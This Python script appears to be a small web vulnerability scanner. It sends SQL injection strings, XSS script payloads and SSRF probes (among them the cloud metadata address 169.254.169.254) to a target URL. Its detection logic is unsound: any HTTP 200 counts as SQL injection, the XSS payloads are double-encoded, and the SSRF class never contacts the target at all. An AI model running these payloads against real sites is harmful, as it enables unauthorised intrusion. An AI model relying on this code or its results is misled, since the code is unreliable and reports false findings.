## main.py
import http.client
from urllib.parse import urlparse, urlencode, parse_qs, quote
import html

class SQLInjectionTester:
    def __init__(self, target_url: str):
        self.target_url = target_url

    def test_injection(self) -> dict:
        results = {}
        payloads = ["' OR '1'='1", "' OR '1'='1' --", "' OR '1'='1' /*"]
        for payload in payloads:
            injected_url = self.construct_url_with_payload(payload)
            response = self.send_request(injected_url)
            if response and response.status == 200:
                results[payload] = 'Vulnerable'
            else:
                results[payload] = 'Not Vulnerable'
        return results

    def construct_url_with_payload(self, payload: str) -> str:
        parsed_url = urlparse(self.target_url)
        query_params = parse_qs(parsed_url.query)
        query_params['query'] = [payload]
        query_string = urlencode(query_params, doseq=True)
        return f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}?{query_string}"

    def send_request(self, url: str):
        try:
            parsed_url = urlparse(url)
            connection = http.client.HTTPSConnection(parsed_url.hostname) if parsed_url.scheme == 'https' else http.client.HTTPConnection(parsed_url.hostname)
            connection.request("GET", parsed_url.path + "?" + parsed_url.query)
            return connection.getresponse()
        except Exception as e:
            print(f"Request to {url} failed: {str(e)}")
            return None

class XSSAttackTester:
    def __init__(self, target_url: str):
        self.target_url = target_url

    def test_xss(self) -> dict:
        results = {}
        payloads = ["<script>alert('XSS')</script>", "<img src='invalid' onerror='alert(\"XSS\")'>", "'\"><script>alert('XSS')</script>"]
        for payload in payloads:
            injected_url = self.construct_url_with_payload(payload)
            response = self.send_request(injected_url)
            if response and response.status == 200:
                response_body = response.read().decode()
                if html.unescape(payload) in response_body:
                    results[payload] = 'Vulnerable'
                else:
                    results[payload] = 'Not Vulnerable'
        return results

    def construct_url_with_payload(self, payload: str) -> str:
        parsed_url = urlparse(self.target_url)
        query_params = parse_qs(parsed_url.query)
        query_params['xss_test'] = [quote(payload)]
        query_string = urlencode(query_params, doseq=True)
        return f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}?{query_string}"

    def send_request(self, url: str):
        try:
            parsed_url = urlparse(url)
            connection = http.client.HTTPSConnection(parsed_url.hostname) if parsed_url.scheme == 'https' else http.client.HTTPConnection(parsed_url.hostname)
            connection.request("GET", parsed_url.path + "?" + parsed_url.query)
            return connection.getresponse()
        except Exception as e:
            print(f"Request to {url} failed: {str(e)}")
            return None

class SSRFExploiter:
    def __init__(self, target_url: str):
        self.target_url = target_url

    def exploit_ssrf(self) -> dict:
        results = {}
        test_urls = ["http://localhost/", "http://localhost:8080/", "http://169.254.169.254/latest/meta-data/"]
        for url in test_urls:
            response = self.send_request(url)
            if response and 200 <= response.status < 400:
                results[url] = 'Vulnerable'
            else:
                results[url] = 'Not Vulnerable'
        return results

    def send_request(self, url: str, method='GET'):
        try:
            parsed_url = urlparse(url)
            connection = http.client.HTTPSConnection(parsed_url.hostname) if parsed_url.scheme == 'https' else http.client.HTTPConnection(parsed_url.hostname)
            connection.request(method, parsed_url.path + "?" + parsed_url.query)
            return connection.getresponse()
        except Exception as e:
            print(f"Request to {url} failed: {str(e)}")
            return None

class Main:
    def __init__(self, url: str):
        self.url = url
        self.sql_tester = SQLInjectionTester(url)
        self.xss_tester = XSSAttackTester(url)
        self.ssrf_exploiter = SSRFExploiter(url)

    def run(self):
        print("Testing SQL Injection...")
        sql_results = self.sql_tester.test_injection()
        print("SQL Injection Results:", sql_results)

        print("Testing XSS...")
        xss_results = self.xss_tester.test_xss()
        print("XSS Results:", xss_results)

        print("Testing SSRF...")
        ssrf_results = self.ssrf_exploiter.exploit_ssrf()
        print("SSRF Results:", ssrf_results)

if __name__ == "__main__":
    target_url = "http://example.com"
    main = Main(target_url)
    main.run()
